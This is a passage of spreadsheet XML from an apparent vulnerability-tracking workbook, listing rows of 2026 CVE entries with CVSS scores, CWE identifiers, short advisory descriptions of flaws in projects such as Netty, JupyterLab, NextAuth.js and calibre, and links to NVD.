      <c r="F2772" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2772" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2772" s="5" t="inlineStr"/>
      <c r="I2772" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2772" s="5" t="inlineStr"/>
      <c r="K2772" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2772" s="5" t="inlineStr">
        <is>
          <t>Browserslist is a configuration tool for sharing target browsers and Node.js versions between front-end tools. Prior to 4.28.7, index.js retains every distinct `(queries, context)` result in cache and every parseQueries() AST in parseCache without a size cap, TTL, or eviction, allowing an attacker who can influence repeated browserslist() query values, including valid since `&lt;year&gt;-&lt;month&gt;-&lt;day&gt;` queries, to bypass the caller-controlled BROWSERSLIST_DISABLE_CACHE mitigation and cause linear memory growth followed by an out-of-memory process crash. This issue is fixed in version 4.28.7.</t>
        </is>
      </c>
      <c r="M2772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73089</t>
        </is>
      </c>
    </row>
    <row r="2773">
      <c r="A2773" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73246</t>
        </is>
      </c>
      <c r="C2773" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2773" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2773" s="5" t="inlineStr"/>
      <c r="F2773" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2773" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2773" s="5" t="inlineStr"/>
      <c r="I2773" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2773" s="5" t="inlineStr"/>
      <c r="K2773" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-306</t>
        </is>
      </c>
      <c r="L2773" s="5" t="inlineStr">
        <is>
          <t>Kestra is an open-source, event-driven orchestration platform. Prior to 2.0.0-rc6, Kestra's worker/src/main/java/io/kestra/worker/endpoint/WorkerEndpoint.java serves GET /worker without authentication and serializes the complete live Task object, which can expose commands, environment variables, HTTP headers, connection details, plaintext credentials, and execution identifiers while the main API on port 8080 remains protected. This issue is fixed in 2.0.0-rc6.</t>
        </is>
      </c>
      <c r="M2773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73246</t>
        </is>
      </c>
    </row>
    <row r="2774">
      <c r="A2774" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73249</t>
        </is>
      </c>
      <c r="C2774" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2774" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2774" s="5" t="inlineStr"/>
      <c r="F2774" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2774" s="5" t="inlineStr"/>
      <c r="H2774" s="5" t="inlineStr"/>
      <c r="I2774" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2774" s="5" t="inlineStr"/>
      <c r="K2774" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2774" s="5" t="inlineStr">
        <is>
          <t>calibre is an e-book manager. Prior to 9.12.0, the calibre Content Server endpoint POST /book-update-annotations/{library_id}/{book_id}/{fmt} in src/calibre/srv/books.py omits needs_db_write=True, causing Router.dispatch() to skip ctx.check_for_write_access() before update_annotations() passes attacker-controlled JSON to db.merge_annotations_for_book(), which allows a readonly user or an anonymous user on an unauthenticated deployment to persist unauthorized book annotation changes. This issue is fixed in version 9.12.0.</t>
        </is>
      </c>
      <c r="M2774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73249</t>
        </is>
      </c>
    </row>
    <row r="2775">
      <c r="A2775" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73285</t>
        </is>
      </c>
      <c r="C2775" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2775" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2775" s="5" t="inlineStr"/>
      <c r="F2775" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2775" s="5" t="inlineStr"/>
      <c r="H2775" s="5" t="inlineStr"/>
      <c r="I2775" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2775" s="5" t="inlineStr"/>
      <c r="K2775" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2775" s="5" t="inlineStr">
        <is>
          <t>RustFS is a distributed object storage system built in Rust. From 1.0.0-alpha.64 until 1.0.0-rc.1, RustFS external OPA authorization enabled by RUSTFS_POLICY_PLUGIN_URL in crates/iam/src/sys.rs sets PreparedIamAuth.needs_existing_object_tag incorrectly for PreparedIamMode::Opa, causing maybe_merge_object_tag_conditions to omit s3:ExistingObjectTag/* values and allowing authenticated users to bypass tag-based policy restrictions. This issue is fixed in version 1.0.0-rc.1.</t>
        </is>
      </c>
      <c r="M2775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73285</t>
        </is>
      </c>
    </row>
    <row r="2776">
      <c r="A2776" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73406</t>
        </is>
      </c>
      <c r="C2776" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2776" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2776" s="5" t="inlineStr"/>
      <c r="F2776" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2776" s="5" t="inlineStr"/>
      <c r="H2776" s="5" t="inlineStr"/>
      <c r="I2776" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2776" s="5" t="inlineStr"/>
      <c r="K2776" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2776" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.39.32, GET /api/global/users/tenant/:id was listed in PUBLIC_ENDPOINTS in packages/worker/src/api/index.ts, and tenantUserLookup returned a full PlatformUser document. An unauthenticated caller could query an email or user identifier, distinguish existing users from missing users, and obtain tenant identifiers, user identifiers, email addresses, SSO identifiers, and document revision metadata. This issue is fixed in version 3.39.32.</t>
        </is>
      </c>
      <c r="M2776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73406</t>
        </is>
      </c>
    </row>
    <row r="2777">
      <c r="A2777" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73415</t>
        </is>
      </c>
      <c r="C2777" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2777" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2777" s="5" t="inlineStr"/>
      <c r="F2777" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2777" s="5" t="inlineStr"/>
      <c r="H2777" s="5" t="inlineStr"/>
      <c r="I2777" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2777" s="5" t="inlineStr"/>
      <c r="K2777" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2777" s="5" t="inlineStr">
        <is>
          <t>jupyterlab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook Architecture. Prior to 4.5.10 and 4.6.2, in packages/imageviewer/src/widget.ts, JupyterLab's ImageViewer uses URL.createObjectURL for a specially crafted SVG image and revokes the blob URL too early, allowing the image to retain an executable same-origin context when it is opened through the image viewer and then opened in a new browser tab. The resulting cross-site scripting can be used to execute arbitrary code on the JupyterLab server. This issue is fixed in versions 4.5.10 and 4.6.2.</t>
        </is>
      </c>
      <c r="M2777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73415</t>
        </is>
      </c>
    </row>
    <row r="2778">
      <c r="A2778" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73418</t>
        </is>
      </c>
      <c r="C2778" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2778" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2778" s="5" t="inlineStr"/>
      <c r="F2778" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2778" s="5" t="inlineStr"/>
      <c r="H2778" s="5" t="inlineStr"/>
      <c r="I2778" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2778" s="5" t="inlineStr"/>
      <c r="K2778" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-248</t>
        </is>
      </c>
      <c r="L2778" s="5" t="inlineStr">
        <is>
          <t>NextAuth.js provides authentication for Next.js. Prior to @auth/core 0.41.3 and next-auth 4.24.15 and 5.0.0-beta.32, the exported getToken() helper in the next-auth/jwt and @auth/core/jwt modules can throw an uncaught exception when it reads a malformed Authorization: Bearer header. When no session cookie is present, getToken() URL-decodes the bearer value before validating it, and malformed percent encoding causes decodeURIComponent() to throw instead of treating the token as invalid. Because getToken() is commonly called in API routes, middleware, and server-side request handlers, a single unauthenticated request can trigger an unhandled exception in code paths that authenticate requests, causing a per-request denial of service without exposing tokens, sessions, or other data and without bypassing authentication. This issue is fixed in @auth/core 0.41.3 and next-auth 4.24.15 and 5.0.0-beta.32.</t>
        </is>
      </c>
      <c r="M2778" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73418</t>
        </is>
      </c>
    </row>
    <row r="2779">
      <c r="A2779" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73493</t>
        </is>
      </c>
      <c r="C2779" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2779" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2779" s="5" t="inlineStr"/>
      <c r="F2779" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2779" s="5" t="inlineStr"/>
      <c r="H2779" s="5" t="inlineStr"/>
      <c r="I2779" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2779" s="5" t="inlineStr"/>
      <c r="K2779" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2779" s="5" t="inlineStr">
        <is>
          <t>Http4s (http4s-blaze-server) is a minimal, idiomatic Scala interface for HTTP services. Prior to 0.23.18 and 1.0.0-M42, http4s-blaze-server aggregates fragments of an incoming WebSocket message with no limit on total size or fragment count. A client that completes a WebSocket handshake can send an unterminated fragmented message and drive unbounded heap growth in the server JVM, resulting in denial of service through OutOfMemoryError. Any http4s application serving WebSocket routes over BlazeServerBuilder is affected, no non-default configuration is required, and maxWebSocketBufferSize does not bound the aggregate because it bounds only individual frames. A single connection sending continuation frames that never set FIN forces the server to buffer every fragment until the heap is exhausted, terminating the JVM with OutOfMemoryError on the blaze selector thread. Small fragments amplify the cost through per-frame object overhead, so a modest volume of wire bytes is sufficient. This issue is fixed in versions 0.23.18 and 1.0.0-M42.</t>
        </is>
      </c>
      <c r="M2779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73493</t>
        </is>
      </c>
    </row>
    <row r="2780">
      <c r="A2780" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73507</t>
        </is>
      </c>
      <c r="C2780" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2780" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2780" s="5" t="inlineStr"/>
      <c r="F2780" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2780" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H2780" s="5" t="inlineStr"/>
      <c r="I2780" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2780" s="5" t="inlineStr"/>
      <c r="K2780" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2780" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.1.136.Final and 4.2.16.Final, io.netty.handler.codec.xml.XmlFrameDecoder.decode() failed to preserve closing-tag parser state across invocations, so an unauthenticated remote attacker could trickle-feed repeated &lt;/ sequences that repeatedly rescanned the accumulated buffer and exhausted an EventLoop thread's CPU, causing denial of service with a maxFrameLength of 1 MB. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.</t>
        </is>
      </c>
      <c r="M2780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73507</t>
        </is>
      </c>
    </row>
    <row r="2781">
      <c r="A2781" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73561</t>
        </is>
      </c>
      <c r="C2781" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2781" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2781" s="5" t="inlineStr"/>
      <c r="F2781" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2781" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2781" s="5" t="inlineStr"/>
      <c r="I2781" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2781" s="5" t="inlineStr"/>
      <c r="K2781" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2781" s="5" t="inlineStr">
        <is>
          <t>Hub is a Node.js WebSocket server and client with added features. Prior to 0.2.16, every incoming unauthenticated WebSocket connection triggers loadDefaultConnectionEventListeners to call requestClientId, which calls rpc.send for the get-client-id action and pushes a request into RPC.requests. The RPC.waitForReply function starts a setInterval polling loop every 10 milliseconds that is cleared only after a matching reply; if the client remains silent and closes, the timer and pending request stay allocated because the socket close path does not cancel them. Repeated connections therefore cause unbounded timers and heap entries, exhausting CPU and memory and making the server unavailable. This issue is fixed in version 0.2.16.</t>
        </is>
      </c>
      <c r="M2781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73561</t>
        </is>
      </c>
    </row>
    <row r="2782">
      <c r="A2782" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73785</t>
        </is>
      </c>
      <c r="C2782" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2782" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2782" s="5" t="inlineStr"/>
      <c r="F2782" s="5" t="inlineStr"/>
      <c r="G2782" s="5" t="inlineStr"/>
      <c r="H2782" s="5" t="inlineStr"/>
      <c r="I2782" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2782" s="5" t="inlineStr"/>
      <c r="K2782" s="5" t="inlineStr">
        <is>
          <t>CWE-241</t>
        </is>
      </c>
      <c r="L2782" s="5" t="inlineStr">
        <is>
          <t>A potential security vulnerability in HPE IceWall Federation Agent and Proxy could allow a remote unauthenticated attacker to cause a denial of service (DoS).</t>
        </is>
      </c>
      <c r="M2782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73785</t>
        </is>
      </c>
    </row>
    <row r="2783">
      <c r="A2783" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73786</t>
        </is>
      </c>
      <c r="C2783" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2783" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2783" s="5" t="inlineStr"/>
      <c r="F2783" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2783" s="5" t="inlineStr"/>
      <c r="H2783" s="5" t="inlineStr"/>
      <c r="I2783" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2783" s="5" t="inlineStr"/>
      <c r="K2783" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2783" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of CPPM could allow an unauthenticated remote attacker to conduct a Denial-of-Service (DoS) attack. Successful exploitation could allow an attacker to cause instability and degrade performance of the vulnerable CPPM server.</t>
        </is>
      </c>
      <c r="M2783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73786</t>
        </is>
      </c>
    </row>
    <row r="2784">
      <c r="A2784" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74761</t>
        </is>
      </c>
      <c r="C2784" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2784" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2784" s="5" t="inlineStr"/>
      <c r="F2784" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2784" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2784" s="5" t="inlineStr"/>
      <c r="I2784" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2784" s="5" t="inlineStr"/>
      <c r="K2784" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L2784" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in TopicRegion in Apache ActiveMQ, Apache ActiveMQ Broker, and Apache ActiveMQ All on all platforms.
An authenticated client can spoof clientId when removing a durable topic subscription.
This issue affects Apache ActiveMQ Broker: before 5.19.11, from 6.0.0 before 6.3.2; Apache ActiveMQ All: before 5.19.11, from 6.0.0 before 6.3.2; Apache ActiveMQ: before 5.19.11, from 6.0.0 before 6.3.2.
Users are recommended to upgrade to version 6.3.2 or 5.19.11 which fixes the issue.</t>
        </is>
      </c>
      <c r="M2784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74761</t>
        </is>
      </c>
    </row>
    <row r="2785">
      <c r="A2785" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75328</t>
        </is>
      </c>
      <c r="C2785" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2785" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2785" s="5" t="inlineStr"/>
      <c r="F2785" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2785" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2785" s="5" t="inlineStr"/>
      <c r="I2785" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2785" s="5" t="inlineStr"/>
      <c r="K2785" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2785" s="5" t="inlineStr">
        <is>
          <t>In DocSys-master V2.02.85, the downloadDocEx interface in src/com/DocSystem/controller/DocController.java has an arbitrary file read vulnerability:</t>
        </is>
      </c>
      <c r="M2785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75328</t>
        </is>
      </c>
    </row>
    <row r="2786">
      <c r="A2786" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75368</t>
        </is>
      </c>
      <c r="C2786" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2786" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2786" s="5" t="inlineStr"/>
      <c r="F2786" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2786" s="5" t="inlineStr"/>
      <c r="H2786" s="5" t="inlineStr"/>
      <c r="I2786" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J2786" s="5" t="inlineStr"/>
      <c r="K2786" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2786" s="5" t="inlineStr">
        <is>
          <t>A stack overflow in the loadRawData function of SpaceDot AcubeSAT OBC software commit eaf90ec allows attackers to cause a Denial of Service (DoS) via supplying a crafted ECSS TC message.</t>
        </is>
      </c>
      <c r="M2786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75368</t>
        </is>
      </c>
    </row>
    <row r="2787">
      <c r="A2787" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75371</t>
        </is>
      </c>
      <c r="C2787" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2787" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2787" s="5" t="inlineStr"/>
      <c r="F2787" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2787" s="5" t="inlineStr"/>
      <c r="H2787" s="5" t="inlineStr"/>
      <c r="I2787" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J2787" s="5" t="inlineStr"/>
      <c r="K2787" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2787" s="5" t="inlineStr">
        <is>
          <t>An integer handling flaw in the cobs_decode function of SpaceDot AcubeSAT OBC software commit eaf90ec allows physically-proximate attackers with UART access to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="M2787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75371</t>
        </is>
      </c>
    </row>
    <row r="2788">
      <c r="A2788" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75413</t>
        </is>
      </c>
      <c r="C2788" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2788" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2788" s="5" t="inlineStr"/>
      <c r="F2788" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2788" s="5" t="inlineStr"/>
      <c r="H2788" s="5" t="inlineStr"/>
      <c r="I2788" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2788" s="5" t="inlineStr"/>
      <c r="K2788" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="L2788" s="5" t="inlineStr">
        <is>
          <t>DocSys V2.02.80 is vulnerable to Any File Download. An attacker does not need to go through authentication to utilize the downloadDocEx.do interface and download any file via the parameter targetPath.</t>
        </is>
      </c>
      <c r="M2788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75413</t>
        </is>
      </c>
    </row>
    <row r="2789">
      <c r="A2789" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75438</t>
        </is>
      </c>
      <c r="C2789" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2789" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2789" s="5" t="inlineStr"/>
      <c r="F2789" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2789" s="5" t="inlineStr"/>
      <c r="H2789" s="5" t="inlineStr"/>
      <c r="I2789" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2789" s="5" t="inlineStr"/>
      <c r="K2789" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L2789" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in Open5GS v2.7.7 allows a remote attacker to cause a denial of service via the ogs_sbi_time_parse() function</t>
        </is>
      </c>
      <c r="M2789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75438</t>
        </is>
      </c>
    </row>
    <row r="2790">
      <c r="A2790" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75465</t>
        </is>
      </c>
      <c r="C2790" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2790" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2790" s="5" t="inlineStr"/>
      <c r="F2790" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2790" s="5" t="inlineStr"/>
      <c r="H2790" s="5" t="inlineStr"/>
      <c r="I2790" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2790" s="5" t="inlineStr"/>
      <c r="K2790" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2790" s="5" t="inlineStr">
        <is>
          <t>The /api.php/user/get_list endpoint in Maccms v10 v2026.1000.4055 is vulnerable to an Incorrect Access Control issue. The interface fails to perform any authentication or authorization checks. An unauthenticated remote attacker can send a crafted HTTP GET request with limit and offset parameters to paginate and retrieve sensitive information of all registered users.</t>
        </is>
      </c>
      <c r="M2790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75465</t>
        </is>
      </c>
    </row>
    <row r="2791">
      <c r="A2791" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75501</t>
        </is>
      </c>
      <c r="C2791" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2791" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2791" s="5" t="inlineStr"/>
      <c r="F2791" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2791" s="5" t="inlineStr"/>
      <c r="H2791" s="5" t="inlineStr"/>
      <c r="I2791" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2791" s="5" t="inlineStr"/>
      <c r="K2791" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2791" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Calix EXOS firmware for the GS7 XGS (GS5239XG) residential router allows unauthenticated remote attackers to modify NAT port‑forwarding rules via the UPnP WANIPConnection service. The device exposes the MiniUPnPd control endpoint on the WAN interface on TCP port 5000 without access controls. A remote attacker can send crafted SOAP requests to add, delete, or enumerate port mappings, or to query the external IP address, without authentication. Successful exploitation may enable bypass of the firewall/NAT boundary and exposure of internal LAN services to the public internet.</t>
        </is>
      </c>
      <c r="M2791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75501</t>
        </is>
      </c>
    </row>
    <row r="2792">
      <c r="A2792" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75998</t>
        </is>
      </c>
      <c r="C2792" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2792" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2792" s="5" t="inlineStr"/>
      <c r="F2792" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2792" s="5" t="inlineStr"/>
      <c r="H2792" s="5" t="inlineStr"/>
      <c r="I2792" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2792" s="5" t="inlineStr"/>
      <c r="K2792" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2792" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue does not require user interaction.</t>
        </is>
      </c>
      <c r="M2792" s="6" t="inlineStr">
        <is>
